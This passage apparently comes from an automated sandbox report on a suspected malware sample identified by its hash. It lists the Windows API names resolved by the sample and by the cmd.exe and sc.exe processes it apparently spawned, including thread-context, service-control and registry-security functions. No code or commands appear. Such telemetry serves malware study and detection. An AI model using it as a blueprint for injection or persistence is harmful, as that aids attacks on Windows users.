with a parameter GetFileSize (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter _allmul (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter SHGetInstanceExplorer (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005976)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00006044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00006044)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00006096)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey 